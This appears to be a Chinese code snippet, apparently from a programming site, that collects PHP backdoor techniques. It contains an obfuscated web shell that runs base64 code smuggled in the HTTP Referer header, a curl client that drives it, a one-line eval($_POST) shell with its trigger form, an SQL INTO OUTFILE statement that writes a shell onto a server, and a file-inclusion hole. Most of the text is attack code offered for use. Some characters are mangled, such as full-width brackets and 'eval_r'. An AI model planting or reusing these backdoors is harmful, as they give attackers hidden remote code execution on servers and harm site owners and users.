http://www.oschina.net/code/snippet_164175_21174?p=1#comments
$_SERVER['HTTP_REFERER']
1.php 上传后门代码 《?php//1.phpheader('Content-type:text/html;charset=utf-8');parse_str($_SERVER['HTTP_REFERER'],
$a);if(reset($a)
== '10' &&
count($a) == 9)
{ eval(base64_decode(str_replace("
", "+",
implode(array_slice($a,
6)))));}2.php 本地
《?php//2.phpheader('Content-type:text/html;charset=utf-8');//要执行的代码$code = <<phpinfo();CODE;//进行base64编码$code =
base64_encode($code);//构造referer字符串$referer =
"a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";//后门url$url =
'http://localhost/test1/1.php';$ch = curl_init();$options =
array( CURLOPT_URL
=> $url, CURLOPT_HEADER
=> FALSE, CURLOPT_RETURNTRANSFER
=> TRUE, CURLOPT_REFERER
=> $referer);curl_setopt_array($ch,
$options);echo
curl_exec($ch);
------------------注意CURL
-------------------------《?php @eval_r($_POST['c']);?》
《html>
《body>
《form action="a.php" method="post">
《input type="text" name="c" value="phpinfo();">
《input type="submit" value="submit">
《/form>
《/body>
《/html>
-------------------
select '《?php @eval_r($_POST["c"]);?》' INTO OUTFILE 'e:/m.php'
--------------
$filename=$_GET['xbid'];
include ($filename);
//危险的include函数,直接编译任何文件为php格式运行